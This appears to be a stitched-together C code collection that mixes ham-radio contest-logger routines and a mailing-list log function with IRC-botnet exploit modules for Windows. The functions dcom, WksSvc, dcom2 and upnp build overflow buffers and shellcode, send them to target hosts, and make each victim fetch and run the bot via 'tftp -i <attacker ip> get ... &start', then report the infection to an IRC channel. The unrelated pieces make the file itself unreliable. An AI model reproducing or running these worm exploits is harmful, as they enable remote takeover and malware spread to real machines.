/* Perform the steps needed to grab a call and then free data
* \return frequency of the spot in Hz
*/
static double execute_grab(spot *data) {
extern char hiscall[];
extern char mode[];
extern int cqmode;
extern float mem;
extern float freq;
double f = data->freq - fldigi_get_carrier();
set_outfreq(f);
send_bandswitch((int) f);
strcpy(hiscall, data->call);
showinfo(getctydata_pfx(hiscall));
searchlog(hiscall);
/* if in CQ mode switch to S&P and remember QRG */
if (cqmode == CQ) {
cqmode = S_P;
strcpy(mode, "S&P ");
mem = freq;
mvprintw(14, 68, "MEM: %7.1f", mem);
}
refreshp();
g_free(data->call);
g_free(data);
return f;
}
void grab_next(void)
{
extern char hiscall[];
extern char mode[];
extern int cqmode;
extern int trx_control;
extern float mem;
extern float freq;
#ifdef HAVE_LIBHAMLIB
extern freq_t outfreq;
#else
extern int outfreq;
#endif
static int dir = 1; /* start scanning up */
spot *data;
if (trx_control == 0)
return;
data = bandmap_next( dir, (unsigned int)(freq*1000) );
if (data == NULL) { /* nothing in that direction */
/* try other one */
dir = 1 - dir;
data = bandmap_next( dir, (unsigned int)(freq*1000));
}
if (data != NULL) {
outfreq = data -> freq;
outfreq -= fldigi_get_carrier();
send_bandswitch( (int) outfreq );
strcpy( hiscall, data->call );
showinfo( getctydata( hiscall ) );
searchlog( hiscall );
/* if in CQ mode switch to S&P and remember QRG */
if (cqmode == CQ) {
cqmode = S_P;
strcpy(mode, "S&P ");
mem = freq;
mvprintw(14, 68, "MEM: %7.1f", mem);
}
refreshp();
g_free( data->call );
g_free( data );
}
}
void grabspot(void)
{
extern char hiscall[];
extern char mode[];
extern int cqmode;
extern int trx_control;
extern float mem;
extern float freq;
#ifdef HAVE_LIBHAMLIB
extern freq_t outfreq;
#else
extern int outfreq;
#endif
spot *data;
if (trx_control == 0)
return;
if (hiscall[0] != '\0') {
data = bandmap_lookup( hiscall );
if (data != NULL) {
outfreq = data -> freq;
outfreq -= fldigi_get_carrier();
send_bandswitch( (int) outfreq );
strcpy( hiscall, data->call );
showinfo( getctydata( hiscall ) );
searchlog( hiscall );
/* if in CQ mode switch to S&P and remember QRG */
if (cqmode == CQ) {
cqmode = S_P;
strcpy(mode, "S&P ");
mem = freq;
mvprintw(14, 68, "MEM: %7.1f", mem);
}
refreshp();
g_free( data->call );
g_free( data );
}
}
}
static void do_log(char *action,unsigned int actlen)
{
action += actlen;
if (*action == '.' || *action == '_') ++action;
if (!flaglist || remote.s == 0)
strerr_die2x(100,FATAL,MSG(ERR_NOT_AVAILABLE));
if (!ismod)
strerr_die2x(100,FATAL,MSG(ERR_NOT_ALLOWED));
showsend("log");
hdr_subject((*action == 0) ? MSG(SUB_LOG) : MSG(SUB_LOG_SEARCH));
hdr_ctboundary();
searchlog(workdir,action,code_subto);
copybottom(0);
qmail_to(&qq,mod.s);
}
void calledit(void) {
extern char hiscall[];
extern int block_part;
int i = 0, l, b = 0;
int j = 0;
int x = 0;
int cnt = 0, insertflg = 0;
char call1[30], call2[10];
l = strlen(hiscall);
b = l - 1;
while ((i != 27) && (b <= strlen(hiscall))) {
attroff(A_STANDOUT);
attron(COLOR_PAIR(C_HEADER));
mvprintw(12, 29, " ");
mvprintw(12, 29, hiscall);
mvprintw(12, 29 + b, "");
/* no refreshp() here as getch() calls wrefresh() for the
* panel with last output (whre the cursor should go */
i = key_get();
// <Delete> or <Insert>
if ((i == KEY_DC) || (i == KEY_IC))
cnt++;
else {
if (i != 27)
cnt = 0;
}
// <Tab>
if (i == 9)
block_part = 1;
else
block_part = 0;
// Ctrl-A (^A) or <Home>, move to head of callsign field.
if (i == 1 || i == KEY_HOME) {
b = 0;
x = 0;
}
// Ctrl-E (^E) or <End>, move to end of callsign field, exit edit mode.
if (i == 5 || i == KEY_END) {
b = strlen(hiscall);
break;
}
// Left arrow
if (i == KEY_LEFT) {
if (b > 0)
b--;
// Right arrow
} else if (i == KEY_RIGHT) {
if (b < strlen(hiscall) - 1) {
b++;
} else
break; /* stop edit */
// <Delete>
} else if (i == KEY_DC) {
l = strlen(hiscall);
for (j = b; j <= l; j++) {
hiscall[j] = hiscall[j + 1]; /* move to left incl. \0 */
}
showinfo(getctydata_pfx(hiscall));
if (cnt > 1)
searchlog(hiscall);
// <Backspace>
} else if (i == KEY_BACKSPACE) {
if (b > 0) {
b--;
l = strlen(hiscall);
for (j = b; j <= l; j++) {
hiscall[j] = hiscall[j + 1];
}
showinfo(getctydata_pfx(hiscall));
if (cnt > 1)
searchlog(hiscall);
}
// <Insert>
} else if (i == KEY_IC) {
if (insertflg == 0)
insertflg = 1;
else
insertflg = 0;
// Any character left other than <Escape>.
} else if (i != 27) {
// Promote lower case to upper case.
if ((i >= 97) && (i <= 122))
i = i - 32;
// Accept A-Z or / and 1-9
if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {
call2[0] = '\0';
if (b <= 12) {
strncpy(call1, hiscall, b);
strncpy(call2, hiscall + b, strlen(hiscall) - (b - 1));
}
if (strlen(hiscall) + 1 == 12)
break; // leave insert mode
if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {
call1[b] = i;
call1[b + 1] = '\0';
if ((strlen(call1) + strlen(call2)) < 12) {
strcat(call1, call2);
// if (strlen(call1) + strlen(hiscall) >= 12) break;
if (strlen(call1) >= 12)
break;
strcpy(hiscall, call1);
}
}
if ((b < strlen(hiscall) - 1) && (b <= 12))
b++;
else
break;
showinfo(getctydata_pfx(hiscall));
searchlog(hiscall);
} else if (x != 0)
i = 27;
} else
i = 27;
}
attroff(A_STANDOUT);
attron(COLOR_PAIR(C_HEADER));
mvprintw(12, 29, hiscall);
mvprintw(12, 29, " ");
refreshp();
attron(A_STANDOUT);
searchlog(hiscall);
}
BOOL dcom(EXINFO exinfo)
{
char sendbuf[IRCLINE];
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
memset(szInBuf, 0, 100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
if (Result == TRUE) {
return FALSE;
}
}
} else { // port 135 and others
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_WINNT)
return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL WksSvc(EXINFO exinfo)
{
char sendbuf[IRCLINE];
char WksFile[MAX_PATH];
char cmd[500]; // Feel the wrath of my spontaneous comments
SOCKET sock;
char overwrite[2045] = "";
char exp_buf[2045+4+16+501];
char ip[30];
LPWSTR ipl[60];
DWORD jmpesp = 0x7518A747;
//LPWSTR unicodesp0[(2045+4+16+501)*2];
char unicode[(2045+4+16+501)*2];
int z = 0;
int x = 0;
int len = 0;
HINSTANCE hinstLib;
MYPROC ProcAddr;
BOOL fRunTimeLinkSuccess = FALSE;
WSADATA wsaData;
if (fWSAStartup(MAKEWORD(2, 0), &wsaData)) return 0;
GetModuleFileName(0, WksFile, sizeof(WksFile)); // Will contain path + filename? :x
// Lets build our request... Seeing as our shellcode binds us a shell, tftp is easy ;O
_snprintf(cmd,sizeof(cmd),
"tftp -i %s get %s"
"&start %s&wank\n",
GetIP(exinfo.sock),WksFile,WksFile);
_snprintf(ip, 24, "\\\\%s", exinfo.ip);
memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &jmpesp, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));
// Small problem, SP0 or SP1? (Trying an incorrect one will probably crash the target machine, so its one or the other :P)
// SP1 for now, seems more popular.
memset(unicode, 0x00, sizeof(unicode));
for (x = 0, z = 0; z <= sizeof(unicode); x++, z+=2) {
unicode[z] = exp_buf[x];
}
/* - SP0 Code
len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));
*/
hinstLib = LoadLibrary("netapi32.dll"); // FIX ME: This is already loaded @ functions.h/loaddlls.cpp?
MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr) {
fRunTimeLinkSuccess = TRUE;
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); // Run NAACN with our nasty settings :O
/*
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
*/
} else {
return FALSE;
}
// Exploit sent, lets check if they left us a shell :)
Sleep(1000); // Testing only (May not be needed)
// Lame old Thunderstorm socket checker.
if((sock=WksSocket(3, 4444, exinfo.ip)) != -1) {
// Send our TFTP/FTP request
fsend(sock, cmd, strlen(cmd), 0);
unsigned int nReadBytes;
char received[1000];
while(1)
{
// Take a Break.
Sleep(1000);
unsigned long ul[2];
ul[0]=1;
ul[1]=sock;
struct timeval timeout;
timeout.tv_sec=1;
timeout.tv_usec=0;
int l=fselect(0, (fd_set *)&ul, 0,0, &timeout);
if ((l==1))
{
if((nReadBytes = frecv(sock, received, sizeof(received), 0))!= SOCKET_ERROR && nReadBytes!=0)
{
received[nReadBytes]=0x00;
if(strstr(received, "not recognized"))
break;
}
}
}
} else {
return FALSE; // (The shell either hasn't arrived or has crashed, so we quit.)
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
fclosesocket(sock);
return TRUE;
}
void calledit(void)
{
extern char hiscall[];
extern int block_part;
int i = 0, l, b = 0;
int j = 0;
int x = 0;
int cnt = 0, insertflg = 0;
char dupecall[20];
char call1[30], call2[10];
l = strlen(hiscall);
b = l - 1;
while ((i != 27) && (b <= strlen(hiscall))) {
attroff(A_STANDOUT);
attron(COLOR_PAIR(C_HEADER));
mvprintw(12, 29, " ");
mvprintw(12, 29, hiscall);
mvprintw(12, 29 + b, "");
/* no refreshp() here as getch() calls wrefresh() for the
* panel with last output (whre the cursor should go */
i = onechar();
if ((i == 161) || (i == 160)) // Ins / Del
cnt++;
else {
if (i != 27)
cnt = 0;
}
if (i == 9)
block_part = 1;
else
block_part = 0;
if (i == 1) // ctrl-A, home
{
b = 0;
x = 0;
}
if (i == 5) // ctrl-E, End
{
b = strlen(hiscall) - 1;
x = 0;
}
if (i == 155) { // left
if (b > 0)
b--;
} else if (i == 154) { // right
if (b < strlen(hiscall) - 1) {
b++;
} else
break; /* stop edit */
} else if (i == 161) { /* delete */
l = strlen(hiscall);
for (j = b; j <= l; j++) {
hiscall[j] = hiscall[j + 1]; /* move to left incl. \0 */
}
strncpy(dupecall, hiscall, 16); /* update cty info */
x = getctydata(dupecall);
showinfo(x);
if (cnt > 1)
searchlog(hiscall);
} else if (i == 127) { /* backspace */
if (b > 0) {
b--;
l = strlen(hiscall);
for (j = b; j <= l; j++) {
hiscall[j] = hiscall[j + 1];
}
strncpy(dupecall, hiscall, 16); /* update cty info */
x = getctydata(dupecall);
showinfo(x);
if (cnt > 1)
searchlog(hiscall);
}
} else if (i == 160) { /* insert */
if (insertflg == 0)
insertflg = 1;
else
insertflg = 0;
} else if (i != 27) {
if ((i >= 97) && (i <= 122))
i = i - 32;
if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {
if (b <= 12) {
strncpy(call1, hiscall, b);
}
if (b <= 12) {
strncpy(call2, hiscall + b, strlen(hiscall) - (b - 1));
}
if (strlen(hiscall) + 1 == 12)
break; // leave insert mode
if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {
call1[b] = i;
call1[b + 1] = '\0';
if ((strlen(call1) + strlen(call2)) < 12) {
strcat(call1, call2);
// if (strlen(call1) + strlen(hiscall) >= 12) break;
if (strlen(call1) >= 12)
break;
strcpy(hiscall, call1);
}
}
if ((b < strlen(hiscall) - 1) && (b <= 12))
b++;
else
break;
strncpy(dupecall, hiscall, 16); /* update cty info */
x = getctydata(dupecall);
showinfo(x);
searchlog(hiscall);
} else if (x != 0)
i = 27;
} else
i = 27;
}
attroff(A_STANDOUT);
attron(COLOR_PAIR(C_HEADER));
mvprintw(12, 29, hiscall);
mvprintw(12, 29, " ");
refreshp();
attron(A_STANDOUT);
searchlog(hiscall);
}
BOOL dcom2(EXINFO exinfo)
{
char sendbuf[IRCLINE],*pTemp;
char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096];
int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0;
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR) return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
if (!iShellSize) return 0;
iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1);
memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
iLoadSize = iPos; iPos = 0;
pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
// connect with target IP
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr==-1) { // connect failed, exit
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
// read reply
frecv(sSocket, szRecvBuf, 4096, 0);
// Check for DCE_PKT_BINDACK
if (szRecvBuf[2] != DCE_PKT_BINDACK) {
fclosesocket(sSocket);
return FALSE;
}
// send evil request
if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
// read reply
frecv(sSocket, szRecvBuf, 4096, 0);
if (szRecvBuf[2] == DCE_PKT_FAULT) {
fclosesocket(sSocket);
return FALSE;
}
fclosesocket(sSocket);
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL upnp(EXINFO exinfo)
{
char sendbuf[IRCLINE],szRequest[2048],szJmpCode[281],szExeCode[840];
int i;
for(i = 0; i < 268; i++)
szJmpCode[i] = (char)0x43;
szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;
//jmp [ebx+0x64], jump to execute shellcode
szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
szJmpCode[280]=(char)0x00;
for(i = 0; i < 32; i++)
szExeCode[i] = (char)0x43;
szExeCode[32] = (char)0x00;
char *sc = (char *)malloc(4096);
DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename);
if (!scsize) {
free(sc);
return FALSE;
}
strcat(szExeCode, sc);
sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);
SOCKET sSock = fsocket(AF_INET, SOCK_STREAM, 0);
if (sSock == SOCKET_ERROR) {
free(sc);
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
memset(ssin.sin_zero, 0, 8);
if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { // Connect failed, exit
free(sc);
fclosesocket(sSock);
return FALSE;
}
if (fsend(sSock, szRequest, strlen(szRequest)+1,0) == SOCKET_ERROR) {
free(sc);
fclosesocket(sSock);
return FALSE;
}
free(sc);
fclosesocket(sSock);
Sleep(1000);
sprintf(sendbuf,"[TFTPD]: File transfer started to IP: %s", exinfo.ip);
if (searchlog(sendbuf, TRUE)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
}
return TRUE;
}
